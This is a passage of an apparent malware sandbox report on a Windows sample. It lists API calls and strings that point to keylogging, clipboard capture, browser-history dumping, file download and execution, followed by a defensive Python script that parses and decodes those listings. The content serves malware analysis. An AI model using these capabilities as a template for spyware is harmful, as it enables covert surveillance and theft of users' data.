                                    • Instruction Fuzzy Hash: 7E01D1B220A71AFEE73016B86CC5D6BA39CEF823B83214725F621922D1DA6C8C414161
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,006D8C97), ref: 006D8BF6
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,006D8C97), ref: 006D8C05
                                    • Sleep.KERNEL32(00002710,?,?,?,006D8C97), ref: 006D8C32
                                    • CloseHandle.KERNEL32(00000000,?,?,?,006D8C97), ref: 006D8C39
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSizeSleep
                                    • String ID:
                                    • API String ID: 1958988193-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00711FDA,?,00000000,00000000,00000000,?,00712306,00000006,FlsSetValue), ref: 00712065
                                    • GetLastError.KERNEL32(?,00711FDA,?,00000000,00000000,00000000,?,00712306,00000006,FlsSetValue,00729068,00729070,00000000,00000364,?,00711DB4), ref: 00712071
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00711FDA,?,00000000,00000000,00000000,?,00712306,00000006,FlsSetValue,00729068,00729070,00000000), ref: 0071207F
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E7A0D
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E7A32
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,?,006D4230,0072F464), ref: 006E7A40
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleReadSize
                                    • String ID:
                                    • API String ID: 3919263394-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00701D01
                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00701D06
                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00701D0B
                                      • Part of subcall function 00705195: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 007051A6
                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00701D20
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                    • String ID:
                                    • API String ID: 1761009282-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 0071007D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00716F6C: GetOEMCP.KERNEL32(00000000,?,?,007171F5,?), ref: 00716F97
                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0071723A,?,00000000), ref: 0071740D
                                    • GetCPInfo.KERNEL32(00000000,:rq,?,?,?,0071723A,?,00000000), ref: 00717420
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CodeInfoPageValid
                                    • String ID: :rq
                                    • API String ID: 546120528-3971408778
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: __alloca_probe_16__freea
                                    • String ID: :nn
                                    • API String ID: 1635606685-2278142754
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00717069
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Info
                                    • String ID: $vuq
                                    • API String ID: 1807457897-226834571
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006D4167
                                      • Part of subcall function 006E7093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,006D417D), ref: 006E70BA
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(006D41F6,?,006D41F6,0072F464), ref: 006E4341
                                      • Part of subcall function 006E432B: CloseHandle.KERNEL32(0072F464,?,006D41F6,0072F464), ref: 006E434A
                                      • Part of subcall function 006E79DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,006D4230,0072F464), ref: 006E79F9
                                    • Sleep.KERNEL32(000000FA,0072F464), ref: 006D4239
                                    Strings
                                    • /sort "Visit Time" /stext ", xrefs: 006D41B3
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "
                                    • API String ID: 368326130-1573945896
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 006FF49E: __onexit.LIBCMT ref: 006FF4A4
                                    • __Init_thread_footer.LIBCMT ref: 006D9C64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                    • API String ID: 1881088180-3686566968
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0071A012,?,00000050,?,?,?,?,?), ref: 00719E92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ACP$OCP
                                    • API String ID: 0-711371036
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • connect.WS2_32(?,0073DBA0,00000010), ref: 006D4A23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: connect
                                    • String ID: TLS Authentication failed$[ERROR]
                                    • API String ID: 1959786783-1964023390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • Sleep.KERNEL32(00000064), ref: 006E2A88
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 006E2AEA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: 8Em
                                    • API String ID: 1931167962-1798622111
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • UnhookWindowsHookEx.USER32(?), ref: 006D961F
                                      • Part of subcall function 006D9634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0073C350), ref: 006D9642
                                      • Part of subcall function 006D9634: wsprintfW.USER32 ref: 006D96C3
                                      • Part of subcall function 006D9634: SetEvent.KERNEL32(00000000,00000000), ref: 006D96ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: EventHookLocalTimeUnhookWindowswsprintf
                                    • String ID: Offline Keylogger Stopped$[Info]
                                    • API String ID: 2949427887-1791908007
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,?p,00000000,00000001,?,?,0070E33F,?,?,0070DD1F,?,00000004), ref: 007125FF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: ?p$IsValidLocaleName
                                    • API String ID: 1901932003-1320801076
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 006D9B16
                                      • Part of subcall function 006D89BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 006D89EE
                                      • Part of subcall function 006D89BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 006D89F9
                                      • Part of subcall function 006D89BA: GetKeyboardLayout.USER32(00000000), ref: 006D8A00
                                      • Part of subcall function 006D89BA: GetKeyState.USER32(00000010), ref: 006D8A0A
                                      • Part of subcall function 006D89BA: GetKeyboardState.USER32(?), ref: 006D8A17
                                      • Part of subcall function 006D89BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 006D8A33
                                      • Part of subcall function 006D8B80: SetEvent.KERNEL32(?,?,?,?,006D9CFC,?,?,?,?,?,00000000), ref: 006D8BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 3195419117-2658077756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 006E2795
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: 8Em$open
                                    • API String ID: 587946157-539362439
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 006D9B70
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: wave$CloseStop
                                    • String ID: 8Em
                                    • API String ID: 3638528417-1798622111
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,006D1D39), ref: 0070AC4E
                                    • GetLastError.KERNEL32 ref: 0070AC5C
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070ACB7
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: 0288f78049d4abc9b4875df12c478ce32a1148833f3107da6e8112864509cf30
                                    • Instruction ID: 78939079c7e89f540d8927463dc2712eacbaae4c32b4b35cc45efa1d1abf090c
                                    • Opcode Fuzzy Hash: 0288f78049d4abc9b4875df12c478ce32a1148833f3107da6e8112864509cf30
                                    • Instruction Fuzzy Hash: 9341C030600346FFDB21CF64C844AAE7BE5EF01311F254769E9599B2E5EB389D01DB62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,006DF89B), ref: 006DF52C
                                    • IsBadReadPtr.KERNEL32(?,00000014,?,006DF89B), ref: 006DF5FE
                                    • SetLastError.KERNEL32(0000007F), ref: 006DF619
                                    • SetLastError.KERNEL32(0000007E,?,006DF89B), ref: 006DF632
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 50ffef09a12bdf50cbb9dacf426482a9b28459a673ec954ab57508b5e4faa245
                                    • Instruction ID: 6d45cfb86587d9ee8640db23b3902080e1232115129acc651ded6b6ee346a918
                                    • Opcode Fuzzy Hash: 50ffef09a12bdf50cbb9dacf426482a9b28459a673ec954ab57508b5e4faa245
                                    • Instruction Fuzzy Hash: D7416871A00205EFEB24CF59D884BAAB7F6FF98310F18846AE446D7750EB35E902DB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%
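The two API listings above (the MultiByteToWideChar/GetLastError pair at 0070AC4E-0070ACB7 and the IsBadReadPtr/SetLastError sequence at 006DF52C-006DF632) are more useful once their numeric arguments are decoded: dwFlags 0x9 is MB_PRECOMPOSED|MB_ERR_INVALID_CHARS, the SetLastError values 0x7E and 0x7F are ERROR_MOD_NOT_FOUND and ERROR_PROC_NOT_FOUND, and 0x14 is sizeof(IMAGE_IMPORT_DESCRIPTOR). The script below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the report's "• Name.Module(args), ref: addr" lines into records and runs two rules over them. The second rule, which reads the combination of 0x14-byte IsBadReadPtr probes with loader error codes as a hand-rolled import resolver, is a heuristic and is labelled as such in the output; the sandbox argument lists are stack snapshots, so entries beyond a function's real parameter count are treated as noise. The sample input is the listing copied from this page.

```python
import re
from dataclasses import dataclass

# Sample input: the API listings of the two functions above, copied from this
# report (Joe Sandbox line format). Values past the real parameter count are
# stack snapshot noise and are ignored by the rules below.
SAMPLE_LISTING = """
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,006D1D39), ref: 0070AC4E
• GetLastError.KERNEL32 ref: 0070AC5C
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070ACB7
• IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,006DF89B), ref: 006DF52C
• IsBadReadPtr.KERNEL32(?,00000014,?,006DF89B), ref: 006DF5FE
• SetLastError.KERNEL32(0000007F), ref: 006DF619
• SetLastError.KERNEL32(0000007E,?,006DF89B), ref: 006DF632
"""

# "• Name.MODULE(arg,arg,...), ref: ADDR" or "• Name.MODULE ref: ADDR" (no args).
API_LINE = re.compile(
    r"^\s*•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants used for decoding (winnls.h / winerror.h / winnt.h).
MB_FLAGS = {0x1: "MB_PRECOMPOSED", 0x2: "MB_COMPOSITE",
            0x4: "MB_USEGLYPHCHARS", 0x8: "MB_ERR_INVALID_CHARS"}
ERROR_MOD_NOT_FOUND = 0x7E
ERROR_PROC_NOT_FOUND = 0x7F
SIZEOF_IMAGE_IMPORT_DESCRIPTOR = 0x14


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # int for hex values the sandbox resolved, None for '?'
    ref: int     # address of the call site


def parse_api_calls(text):
    """Parse report API lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16)
                for a in raw.split(",") if a.strip()]
        calls.append(ApiCall(m.group("name"), m.group("module").upper(),
                             args, int(m.group("ref"), 16)))
    return calls


def decode_mb_flags(value):
    """Render a MultiByteToWideChar dwFlags value as its symbolic OR-list."""
    names = [n for bit, n in MB_FLAGS.items() if value & bit]
    return "|".join(names) or "0"


def triage(calls):
    """Apply two rules and return human-readable findings (a list of strings)."""
    findings = []
    # Rule 1: decode dwFlags (2nd argument) of every MultiByteToWideChar call;
    # MB_ERR_INVALID_CHARS means the conversion fails on malformed input
    # instead of substituting, which is why GetLastError follows the call.
    for c in calls:
        if c.name == "MultiByteToWideChar" and len(c.args) > 1 and c.args[1] is not None:
            findings.append(f"{c.ref:08X}: MultiByteToWideChar dwFlags="
                            f"{decode_mb_flags(c.args[1])}")
    # Rule 2 (heuristic): IsBadReadPtr probes of sizeof(IMAGE_IMPORT_DESCRIPTOR)
    # plus SetLastError(ERROR_MOD_NOT_FOUND / ERROR_PROC_NOT_FOUND) is how a
    # hand-rolled import resolver mimics LoadLibrary/GetProcAddress failures.
    probes = [c for c in calls if c.name == "IsBadReadPtr"
              and len(c.args) > 1 and c.args[1] == SIZEOF_IMAGE_IMPORT_DESCRIPTOR]
    errors = {c.args[0] for c in calls if c.name == "SetLastError" and c.args}
    if probes and {ERROR_MOD_NOT_FOUND, ERROR_PROC_NOT_FOUND} <= errors:
        findings.append(
            "heuristic: hand-rolled import resolution ("
            f"{len(probes)} IsBadReadPtr probe(s) of 0x14 bytes, "
            "SetLastError ERROR_MOD_NOT_FOUND/ERROR_PROC_NOT_FOUND)")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_api_calls(SAMPLE_LISTING)):
        print(finding)
```

Run the script as-is to see the two decoded MultiByteToWideChar calls and the import-resolver heuristic fire on the listing above; paste other "APIs" sections of this report into SAMPLE_LISTING to apply the same rules to them.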